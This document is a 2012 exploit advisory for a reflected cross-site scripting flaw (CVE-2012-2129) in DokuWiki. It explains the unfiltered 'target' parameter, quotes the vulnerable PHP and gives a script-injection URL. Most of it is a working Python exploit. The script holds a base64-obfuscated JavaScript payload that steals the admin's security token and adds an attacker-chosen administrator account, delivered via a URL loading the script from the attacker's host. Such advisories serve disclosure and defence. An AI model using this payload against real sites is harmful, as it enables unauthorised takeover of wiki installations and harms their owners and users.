DokuWiki Ver.2012/01/25 CSRF Add User Exploit

Published: 2012-04-17 CVE: 2012-2129 OSVDB-ID: N/A
  1. ######################################################################################
  2. DokuWiki Ver.2012/01/25 ( Latest Version ) CSRF Add User Exploit
  3. ######################################################################################
  4. Discovered by : Khashayar Fereidani
  5. Team Website : HTTP://IRCRASH.COM ( IRCRASH Security Community )
  6. Facebook : http://facebook.com/fereidani
  7. Twitter : https://twitter.com/#!/IRCRASH
  8. Facebook Page : http://www.facebook.com/pages/IRCRASH/127804297326163
  9. Software Developer : http://www.dokuwiki.org/
  10. ######################################################################################
  11. Test System Details
  12. OS : Linux
  13. WebServer : Nginx + PHP-5.3.5
  14. WebBrowser : Firefox 10
  15. ######################################################################################
  16. Subjects :
  17. 1. Vulnerability Explanation
  18. 2. Code Review
  19. 3. Cross Site Scripting vulnerability Proof of concept
  20. 4. Add User Exploit
  21. ######################################################################################
  22. 1. Vulnerability Explanation :
  23.  
  24. Variable target in file /inc/html.php will not be checked for illegal input and
  25.  function html_edit_form print $param['target'] from $param array without any filter.
  26. This variable(target) is exploitable for Cross Site Scripting vulnerability .
  27.  
  28. ######################################################################################
  29. 2. Code Review :
  30.  
  31. # Filename : /inc/html.php
  32. ** Line 1336 ( Vulnerable Variable $_REQUEST['target'] ) :
  33. $data =     array('form' => $form,
  34.                   'wr'   => $wr,
  35.                   'media_manager' => true,
  36.                   'target' => (isset($_REQUEST['target']) && $wr &&
  37.                                $RANGE !== '') ? $_REQUEST['target'] : 'section',
  38.                   'intro_locale' => $include);
  39.  
  40. ** Line 1436 (Vulnerable Function) :
  41. function html_edit_form($param) {
  42.     global $TEXT;
  43.  
  44.     if ($param['target'] !== 'section') {
  45.         msg('No editor for edit target ' . $param['target'] . ' found.', -1);
  46.     }
  47.  
  48.     $attr = array('tabindex'=>'1');
  49.     if (!$param['wr']) $attr['readonly'] = 'readonly';
  50.  
  51.     $param['form']->addElement(form_makeWikiText($TEXT, $attr));
  52. }
  53. ######################################################################################
  54. 3. Cross Site Scripting vulnerability Proof of concept :
  55. Vulnerable URL : http://WEBSITE/doku.php?do=edit&id=S9F8W2A&target=[XSS]
  56. Sample : http://sitename/doku.php?do=edit&id=S9F8W2A&target=<script>alert(123)</script>
  57. ######################################################################################
  58. 4. Add User Exploit :
  59. #EXPLOITSTART
  60. #!/usr/bin/python
  61. import base64,string,random
  62. def randstr(size=8, chars=string.ascii_uppercase + string.digits):
  63.     return ''.join(random.choice(chars) for x in range(size))
  64. print """
  65. #####################################
  66. # IRCRASH Dokuwiki Add User Exploit #
  67. # Exploited By Khashayar Fereidani  #
  68. # Http://ircrash.com                #
  69. #####################################
  70. """
  71. shellcode="""
  72. ZnVuY3Rpb24gTXlSZXF1ZXN0KCkgew0KaWYgKHdpbmRvdy5YTUxIdHRwUmVxdWVzdCkgew0KUmVxUmVh
  73. ZGVyID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7DQp9IGVsc2Ugew0KUmVxUmVhZGVyID0gbmV3IEFjdGl2
  74. ZXhPYmplY3QoIk1pY3Jvc29mdC5YTUxIVFRQIik7DQp9DQpSZXFSZWFkZXIub25yZWFkeXN0YXRlY2hh
  75. bmdlID0gZnVuY3Rpb24gKCkgeyBUb2tlbkZpbmRlcihSZXFSZWFkZXIpOyB9DQpSZXFSZWFkZXIub3Bl
  76. bigiR0VUIiwgImRva3UucGhwIiwgdHJ1ZSk7DQpSZXFSZWFkZXIuc2VuZCgpOw0KfQ0KZnVuY3Rpb24g
  77. VG9rZW5GaW5kZXIoYSkgew0KaWYgKGEucmVhZHlTdGF0ZSA9PSA0ICYmIGEuc3RhdHVzID09IDIwMCkg
  78. ew0KdmFyIHNyYyA9IGEucmVzcG9uc2VUZXh0Ow0KcCA9IC92YWx1ZT0iKFswLTlhLWZdKykiLzsNCnZh
  79. ciB0b2tlbiA9IHNyYy5tYXRjaChwKTsNCnBhcmFtcyA9ICJzZWN0b2s9IiArIHRva2VuWzFdICsgIiZ1
  80. c2VyaWQ9VVNFUk5BTUUmdXNlcnBhc3M9UEFTU1dPUkQmdXNlcm5hbWU9VVNFUk5BTUUmdXNlcm1haWw9
  81. YXR0QHd3d3d3d3d3Lm9zZmEmdXNlcmdyb3Vwcz1hZG1pbix1c2VyJmRvPWFkbWluJnBhZ2U9dXNlcm1h
  82. bmFnZXImc3RhcnQ9MCZmblthZGRdPUFkZCI7DQphbGVydChwYXJhbXMpOw0KRXhwbG9pdChwYXJhbXMp
  83. Ow0KfQ0KfQ0KZnVuY3Rpb24gRXhwbG9pdChwYXJhbWV0ZXJzKSB7DQppZiAod2luZG93LlhNTEh0dHBS
  84. ZXF1ZXN0KSB7DQpIdHRwUmVxID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7DQp9IGVsc2Ugew0KSHR0cFJl
  85. cSA9IG5ldyBBY3RpdmV4T2JqZWN0KCJNaWNyb3NvZnQuWE1MSFRUUCIpOw0KfQ0KSHR0cFJlcS5vbnJl
  86. YWR5c3RhdGVjaGFuZ2UgPSBmdW5jdGlvbiAoKSB7DQppZiAoSHR0cFJlcS5yZWFkeVN0YXRlID09IDQg
  87. JiYgSHR0cFJlcS5zdGF0dXMgPT0gMjAwKSB7DQoNCn0NCn0NCkh0dHBSZXEub3BlbignUE9TVCcsICJk
  88. b2t1LnBocD9pZD1kb2Fka3dva2FkIiwgdHJ1ZSk7DQpIdHRwUmVxLnNldFJlcXVlc3RIZWFkZXIoIkNv
  89. bnRlbnQtdHlwZSIsICJhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQiKTsNCkh0dHBSZXEu
  90. c2V0UmVxdWVzdEhlYWRlcigiQ29udGVudC1sZW5ndGgiLCBwYXJhbWV0ZXJzLmxlbmd0aCk7DQpIdHRw
  91. UmVxLnNldFJlcXVlc3RIZWFkZXIoIkNvbm5lY3Rpb24iLCAiY2xvc2UiKTsNCkh0dHBSZXEuc2VuZChw
  92. YXJhbWV0ZXJzKTsNCn0NCk15UmVxdWVzdCgpOw0K"""
  93. shellcode=base64.b64decode(shellcode)
  94. username=raw_input("[*] Enter New Username :")
  95. password=raw_input("[*] Enter Password :")
  96. shellcode=shellcode.replace("USERNAME",username).replace("PASSWORD",password)
  97. localFile = open('my.js', 'w')
  98. localFile.write(shellcode)
  99. localFile.close()
  100. print """[*] A new file (my.js) added to your local folder .
  101.   Upload it on your own host and send it for doku admin like this :
  102.   http://WEBSITE/PATH/doku.php?do=edit&id=""" + randstr() + "&target=<script SRC=http://YOUROWNHOST/YOURFOLDER/my.js></script>"
  103. #EXPLOITEND
  104. ######################################################################################
  105.           Tnx : Just God
  106. ######################################################################################
  107.  
  108.  

Other Refrences

SECUNIA Advistory : http://secunia.com/advisories/48848/
SECURITYFOCUS Advistory : http://www.securityfocus.com/bid/53041
SECLISTS Advistory : http://seclists.org/bugtraq/2012/Apr/121
IRCRASH Advistory : http://ircrash.com/uploads/dokuwiki.txt